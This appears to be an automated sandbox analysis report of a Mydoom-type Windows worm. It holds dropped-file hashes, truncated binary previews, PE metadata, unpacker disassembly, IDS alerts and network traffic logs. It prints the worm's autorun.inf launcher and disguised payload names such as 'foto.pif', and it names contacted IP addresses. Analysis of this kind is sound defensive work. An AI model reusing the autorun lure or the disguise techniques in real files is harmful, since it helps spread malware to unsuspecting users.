File Type:	Mini DuMP crash report, 14 streams, Sun Jul 17 06:24:24 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	132558
Entropy (8bit):	2.0975868012813264
Encrypted:	false
SSDEEP:	384:Cfdg6rc679GTl1SzKNWY8t96yosJDmbkw/PROo+aHy7Ih1OT29:36rb9KSWYZ5JDGZ+ayJM
MD5:	16EADDC8E6734F9ADE1ECCB67A6F3663
SHA1:	7B9BD0C87215069C91731E90D01D20621BC881EB
SHA-256:	976625276CEDF3A5146E480039CDD2037AB9D5E13C047592CDAF55CBA0D55E26
SHA-512:	3C9F102340B7F1C394717FA5A433A16A06FA270523FA0454705DAB3297C131410421ECB358A39F454E426E0A1FEE9F178BEF96F44188AED0786F968F0C7F4CEA
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........b............t...............\|............O..........T.......8...........T........... ;..............p...........\!...................................................................U...........B.......!......GenuineIntelW...........T..............b.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	10844
Entropy (8bit):	3.1618727884224525
Encrypted:	false
SSDEEP:	192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+Ewh+G:j+s+i+Z+z+B+c+Y+0g+J+j+1+G
MD5:	D83C20AAF8DADE06BEC5E4C4643EAD82
SHA1:	523C4F7813B31C1B5D008E56CE5920376C8ABB62
SHA-256:	7ED25801D59B6C135CC2F414CB6730A932668E23C4C40965CE1F7875796B890F
SHA-512:	CDE0D19A1AFA23824F895C035DC947F0ACFD6F97EB77DFBF6F75D1212D38023C9B629983A549DFC6399C1F8C60BF7527154712E0AAFB7DFA3B544197FA75F769
Malicious:	false
Reputation:	low
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\SysWOW64\ctfmen.exe

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4160
Entropy (8bit):	6.508903128935774
Encrypted:	false
SSDEEP:	96:LdIdSLQPZARC3dCE8Y0Jw5NL6EVwHHKg2:pswdRCNCE8YPWowHHK7
MD5:	B76123561821C1EF6C90EB2F63793911
SHA1:	BEE71FE61BBF781C7C5583CEBDE43AF31C256F70
SHA-256:	F937B1F9910637B48DA8F3699E42D845A74FB5ECF2EE9862D4D16F0904857C7E
SHA-512:	0AC8DE5EDC0FEF666F0E8B50E3194D77371ABC9BEDC0ED678CAF7634D9C4C1AD1C5451B3628964F83BA54B8CD4532601D7596E024DBC3E3860A432667B3CE6F9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@.......................................................................................................PE..L......................8.........`.......p........@........................................... .....................................................................................................................................................4v0yeveo.`..............................4847xtmv.....p......................@...488vjzju@.......@...................@...........!....U6..72.*S..........&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..p........'OS~.{.P$-..@.$t.,...k...E.-.D... .l.$s@@T...........d4....d...w..-...Q.....G...t. .k......@0.Q9,+....#.t(P.~......7$i....}.......l.....g...I....".&.m..X\|...7,d.;....o.O........L....!..&?.... .\|.s.%]..t&....]..?]i.\|...U...p.S..M.........8.t.B....r..9...:.

C:\Windows\SysWOW64\grcopy.dll

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	42596
Entropy (8bit):	7.764619203551428
Encrypted:	false
SSDEEP:	768:beMc5VwWt1jDkbXdnTOyQxHFO+IxX2P5LIbbcPYir2lAqcdF0i09syE:bq5VwWDjDkdTRqHFOn8tIbbeYiuZIFS6
MD5:	BEB57891AD9E1F6933F96B67C620CE21
SHA1:	F3595F785627E679ABFDD4247B89F45499F364E1
SHA-256:	56428FDF79F7AAE6C26AC99DDBB57D5044E66A9A868DCB754B1BED1A989CBC03
SHA-512:	7DA6F10FF9FA0637D7EEE7860012C39D12C386DBC86DB5E23F1F445D9703F4D01380D40235078D16E08CA234C6ED869F998E19E3CBF20142C652E1986019582E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@.......................................................................................................PE..L......................8.........0.......@........@........................................... .....................................................................................................................................................5682hkuj.0..............................5460fgai.....@......................@...5500hosh@.......@...................@...........!.....E....=Q...w.......&..k....U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..........'OSk.w.P$-..@.$...,].=.....E.-.D.f.~...$s@AT....?.........0.A.d.....-.........G...t. }.......@0.Q9..#y.+#.t(P.\|......7.i5...................I0r..M.."........1nX..;.....t.........L...&.B&{?..........%]..t&...`...?]i............U..P..L..srv@....).......-

C:\Windows\SysWOW64\grcopy.dll:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\SysWOW64\satornas.dll

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	Microsoft Windows Autorun file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	183
Entropy (8bit):	4.91506085818587
Encrypted:	false
SSDEEP:	3:It1WN0YdR/ce6eHwcy/9RfyCtxWaFkjIjm5fHq4xm5fYTVuAT0Gce6i/Qfn:e1WddRUe9EKCtxWaFiIS5fnU58uATUeu
MD5:	B7B0D175078535DEE223BA9B9A8211B4
SHA1:	477E1EC7489140B1C8523F61C861905D1D57BD40
SHA-256:	F6E7FC003682ECC3804B7DE0BE36F56FB514646BE2B95C44A3EE11CD6DBB4929
SHA-512:	E8A03D8D0ADF7B11F8B252E217EA26D5D4BD724C54CF3015C2D2E14085A7346BCDFC8138639B46C128B82066E21A11EC107D9586AB74425062B8A0730D14993E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	[autorun]..shellexecute=e847bcyu.exe..icon=%SystemRoot%\system32\SHELL32.dll,4..action=Open folder to view files..shell\default=Open..shell\default\command=e847bcyu.exe..shell=default

C:\Windows\SysWOW64\shervans.dll

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	6.969321805298346
Encrypted:	false
SSDEEP:	192:2h4SFyvWohE5xf6YUBSL63SUJqtMblWN:2O+ohE2B13NJqtM
MD5:	5B75EE8F3ED1A9C8BAB6E4747174A502
SHA1:	E0E2708962113E34D930A8093C7608AF3D9C70A1
SHA-256:	F213F6B3CA569142262C127198B9DFDB019C0B0F4D383C9EF4BA9D8CCAA9CBBB
SHA-512:	F44CE66D2B2D28F5C1D1DA1CF3CD6DEDFBCACDA2DD4474FDF9342BADB49F0E32F8A8781F876C6F18D846104243BC1BF9ACC20A0264E01A16E7D8E713F7F06D0B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......K...........#...8. ..........p......................................................... .....................`...`.......`...................................................................................................................5381fpcp................................5c33yiab. ..........................@...5676uoia............................@...........!...............U....@..&.......U..S.......P...t?........'.........9.r.....t...'.....s.t&...$..$.1....$....6..X[]._V`..u......m.tG.t$lE_D$.....=[......"....1..........uG..4....uF1..e.[^]...A..f...!.+.o...y....!.. .......o.......8./;.of.p.v..U...}o...........O$.......O/.mX....].....[:..M.....=.D.T..Xs..[.4W<s/{.Gq.%...w+\|7.]..u.~&]."..{d$.....p..X... ..>...............l....#.J...6..F.W...}W.].C.t..~4...\e.....<......@.7w.}....!..)...3.......e._V ...A.].s.N..kn...CU...

C:\Windows\SysWOW64\smnss.exe

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	42596
Entropy (8bit):	7.764619203551428
Encrypted:	false
SSDEEP:	768:beMc5VwWt1jDkbXdnTOyQxHFO+IxX2P5LIbbcPYir2lAqcdF0i09syE:bq5VwWDjDkdTRqHFOn8tIbbeYiuZIFS6
MD5:	BEB57891AD9E1F6933F96B67C620CE21
SHA1:	F3595F785627E679ABFDD4247B89F45499F364E1
SHA-256:	56428FDF79F7AAE6C26AC99DDBB57D5044E66A9A868DCB754B1BED1A989CBC03
SHA-512:	7DA6F10FF9FA0637D7EEE7860012C39D12C386DBC86DB5E23F1F445D9703F4D01380D40235078D16E08CA234C6ED869F998E19E3CBF20142C652E1986019582E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@.......................................................................................................PE..L......................8.........0.......@........@........................................... .....................................................................................................................................................5682hkuj.0..............................5460fgai.....@......................@...5500hosh@.......@...................@...........!.....E....=Q...w.......&..k....U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..........'OSk.w.P$-..@.$...,].=.....E.-.D.f.~...$s@AT....?.........0.A.d.....-.........G...t. }.......@0.Q9..#y.+#.t(P.\|......7.i5...................I0r..M.."........1nX..;.....t.........L...&.B&{?..........%]..t&...`...?]i............U..P..L..srv@....).......-

C:\Windows\SysWOW64\smnss.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\EAfIchN1gN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\SysWOW64\zipfi.dll

Download File

Process:	C:\Windows\SysWOW64\smnss.exe
File Type:	Zip archive data, at least v1.0 to extract
Category:	dropped
Size (bytes):	42714
Entropy (8bit):	7.760822474314925
Encrypted:	false
SSDEEP:	768:7eMc5VwWt1jDkbXdnTOyQxHFO+IxX2P5LIbbcPYir2lAqcdF0i09sy4:7q5VwWDjDkdTRqHFOn8tIbbeYiuZIFSS
MD5:	192BA479760C526451B5CC9653FF5091
SHA1:	4E9816D86B2D3F1BFAF991B481BD8C4705F06754
SHA-256:	608EFC909D923F3F22BB7526793C18531B88920B090CA0781A85435D3174C9E8
SHA-512:	A6A7F2B418D5AEA905A1FEA16E9052A68BF8449048FB54223A2F178D5273AEDC3935455E94C19AF320212A7244488E45D7DCB9F69F7A5FEAC9BA414F6CB0A3B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	PK.........3.0.y.d...d.......Readme.exeMZ......................@.......................................................................................................PE..L......................8.........0.......@........@........................................... .....................................................................................................................................................5682hkuj.0..............................5460fgai.....@......................@...5500hosh@.......@...................@...........!.....E....=Q...w.......&..k....U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..........'OSk.w.P$-..@.$...,].=.....E.-.D.f.~...$s@AT....?.........0.A.d.....-.........G...t. }.......@0.Q9..#y.+#.t(P.\|......7.i5...................I0r..M.."........1nX..;.....t.........L...&.B&{?..........%]..t&...`...?

C:\Windows\SysWOW64\zipfiaq.dll

Download File

Process:	C:\Windows\SysWOW64\smnss.exe
File Type:	Zip archive data, at least v1.0 to extract
Category:	dropped
Size (bytes):	42710
Entropy (8bit):	7.760709935948498
Encrypted:	false
SSDEEP:	768:AeMc5VwWt1jDkbXdnTOyQxHFO+IxX2P5LIbbcPYir2lAqcdF0i09syH:Aq5VwWDjDkdTRqHFOn8tIbbeYiuZIFSp
MD5:	34948C0E58F3CF686AAE302E39E2B290
SHA1:	AFAD69F68BAE7DA4107F4E1292AD65E117AF50BC
SHA-256:	A9E935925B02C3D6FED278667887A22C0899CBAC6B3FCD9A35B2AD5DDF933404
SHA-512:	A7DF28D43CF114FE91E872C17983B2CACA3CB4B3D0FACB5A1D5CA069CAC8557324723E1007B0CE1C21120B10C9D6EA3EA4A3997503747EC8FA7D5CEF8A7E10D3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	PK.........3.0.y.d...d.......foto.pifMZ......................@.......................................................................................................PE..L......................8.........0.......@........@........................................... .....................................................................................................................................................5682hkuj.0..............................5460fgai.....@......................@...5500hosh@.......@...................@...........!.....E....=Q...w.......&..k....U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..........'OSk.w.P$-..@.$...,].=.....E.-.D.f.~...$s@AT....?.........0.A.d.....-.........G...t. }.......@0.Q9..#y.+#.t(P.\|......7.i5...................I0r..M.."........1nX..;.....t.........L...&.B&{?..........%]..t&...`...?]i

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.764665111044261
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EAfIchN1gN.exe
File size:	42596
MD5:	343aab3b8c412c765f9fc753e1f18520
SHA1:	1173a61d54bb5bc66e403cbe4a8f02662c4dd359
SHA256:	edb7aeaa857881d943f0cd8da0556a6ec7ea8887327679678e0e02ad57423743
SHA512:	81029ab0b2a624488bf317b333c19bbbe5a24841a7a113aaf1e0dbb47b5a99bf12b78351689615523118121bbc008e0c9a0c3e58e2c0a2febb936ce9d7d17ed6
SSDEEP:	768:jxeMc5VwWt1jDkbXdnTOyQxHFO+IxX2P5LIbbcPYir2lAqcdF0i09syE:jxq5VwWDjDkdTRqHFOn8tIbbeYiuZIFp
TLSH:	DD13E194F42387B5D240A77347869BC91371BE64A7A6738629C2FF6FBC312E8442563C
File Content Preview:	MZ......................@.......................................................................................................PE..L......................8.........0.......@........@........................................... ............................

File Icon


Icon Hash:	c6d2f2c2cec2c2e2

Static PE Info

General

Entrypoint:	0x41d990
Entrypoint Section:	y899crkm
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	516ac027f1c3c7a86cc636d666c6f3e2

Entrypoint Preview

Instruction
pushad
mov esi, 00414015h
lea edi, dword ptr [esi-00013015h]
push edi
jmp 00007F73ED21CDBDh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F73ED21CDB9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F73ED21CD9Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F73ED21CDB9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F73ED21CDA1h
jne 00007F73ED21CDBBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F73ED21CD96h
xor ecx, ecx
sub eax, 03h
jc 00007F73ED21CDBFh
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F73ED21CE26h
mov ebp, eax
add ebx, ebx
jne 00007F73ED21CDB9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jne 00007F73ED21CDB9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jne 00007F73ED21CDD2h
inc ecx
add ebx, ebx
jne 00007F73ED21CDB9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F73ED21CDA1h
jne 00007F73ED21CDBBh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F73ED21CD96h
add ecx, 02h
cmp ebp, FFFFF300h
adc ecx, 01h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F73ED21CDC1h
mov al, byte ptr [edx]
inc edx
mov byte ptr [edi], al
inc edi
dec ecx
jne 00007F73ED21CDA9h
jmp 00007F73ED21CD18h
nop
mov eax, dword ptr [edx]
add edx, 04h
mov dword ptr [edi], eax
add edi, 04h
sub ecx, 04h
jnbe 00007F73ED21CDA3h
add edi, ecx
jmp 00007F73ED22CD01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e510	0x1e8	718zwvss
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e000	0x510	718zwvss
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
68d6cyfj	0x1000	0x13000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
y899crkm	0x14000	0xa000	0x9c00	False	0.9779146634615384	data	7.883560145842604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
718zwvss	0x1e000	0x840	0x840	False	0.2878787878787879	data	3.4608917053851687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1e0d4	0x2e8	data	English	United States
RT_ICON	0x1e3c0	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_GROUP_ICON	0x1e4ec	0x22	data	English	United States

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.DLL	RegCloseKey
DNSAPI.DLL	DnsQuery_A
msvcrt.dll	_iob
USER32.dll	wsprintfA
WININET.DLL	InternetGetConnectedState
WS2_32.DLL	recv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.464.70.19.20349776802807187 07/17/22-08:24:17.965396	TCP	2807187	ETPRO TROJAN User-Agent (explwer)	49776	80	192.168.2.4	64.70.19.203
192.168.2.4206.191.152.3749758802807187 07/17/22-08:24:14.946410	TCP	2807187	ETPRO TROJAN User-Agent (explwer)	49758	80	192.168.2.4	206.191.152.37
192.168.2.464.70.19.20349776802807186 07/17/22-08:24:17.965396	TCP	2807186	ETPRO TROJAN Worm.Mydoom Checkin	49776	80	192.168.2.4	64.70.19.203
192.168.2.4206.191.152.3749758802807186 07/17/22-08:24:14.946410	TCP	2807186	ETPRO TROJAN Worm.Mydoom Checkin	49758	80	192.168.2.4	206.191.152.37
206.191.152.37192.168.2.480497582037771 07/17/22-08:24:15.189819	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49758	206.191.152.37	192.168.2.4

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 17, 2022 08:24:14.704675913 CEST	49758	80	192.168.2.4	206.191.152.37
Jul 17, 2022 08:24:14.946023941 CEST	80	49758	206.191.152.37	192.168.2.4
Jul 17, 2022 08:24:14.946155071 CEST	49758	80	192.168.2.4	206.191.152.37
Jul 17, 2022 08:24:14.946409941 CEST	49758	80	192.168.2.4	206.191.152.37
Jul 17, 2022 08:24:15.189693928 CEST	80	49758	206.191.152.37	192.168.2.4
Jul 17, 2022 08:24:15.189819098 CEST	80	49758	206.191.152.37	192.168.2.4
Jul 17, 2022 08:24:15.189882040 CEST	80	49758	206.191.152.37	192.168.2.4
Jul 17, 2022 08:24:15.189948082 CEST	49758	80	192.168.2.4	206.191.152.37
Jul 17, 2022 08:24:15.631697893 CEST	49758	80	192.168.2.4	206.191.152.37
Jul 17, 2022 08:24:17.799180984 CEST	49776	80	192.168.2.4	64.70.19.203
Jul 17, 2022 08:24:17.965095043 CEST	80	49776	64.70.19.203	192.168.2.4
Jul 17, 2022 08:24:17.965214968 CEST	49776	80	192.168.2.4	64.70.19.203
Jul 17, 2022 08:24:17.965395927 CEST	49776	80	192.168.2.4	64.70.19.203
Jul 17, 2022 08:24:18.131606102 CEST	80	49776	64.70.19.203	192.168.2.4
Jul 17, 2022 08:24:18.131642103 CEST	80	49776	64.70.19.203	192.168.2.4
Jul 17, 2022 08:24:18.131773949 CEST	49776	80	192.168.2.4	64.70.19.203
Jul 17, 2022 08:24:23.344441891 CEST	49776	80	192.168.2.4	64.70.19.203

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 17, 2022 08:24:14.565578938 CEST	64454	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:14.675084114 CEST	53	64454	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.449079990 CEST	60506	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.470220089 CEST	53	60506	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.482076883 CEST	64277	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.501424074 CEST	53	64277	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.607815981 CEST	56076	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.636457920 CEST	53	56076	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.658731937 CEST	60758	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.680419922 CEST	53	60758	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.691276073 CEST	60647	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.720290899 CEST	53	60647	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.730096102 CEST	64909	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.780421972 CEST	53	64909	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:15.879152060 CEST	60381	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:15.900845051 CEST	53	60381	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:16.726676941 CEST	56509	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:16.748385906 CEST	53	56509	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:16.800127983 CEST	54069	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:16.827198982 CEST	53	54069	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:16.941122055 CEST	57747	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:16.961141109 CEST	53	57747	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.015161037 CEST	58171	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.050703049 CEST	53	58171	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.094142914 CEST	57594	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.115701914 CEST	53	57594	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.121287107 CEST	60512	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.149889946 CEST	53	60512	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.164396048 CEST	61361	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.185517073 CEST	53	61361	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.190717936 CEST	50445	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.210046053 CEST	53	50445	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.215923071 CEST	51679	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.254570007 CEST	53	51679	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.720094919 CEST	52472	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.745635033 CEST	53	52472	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:17.767482042 CEST	62354	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:17.787781954 CEST	53	62354	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:18.183559895 CEST	50061	53	192.168.2.4	8.8.8.8
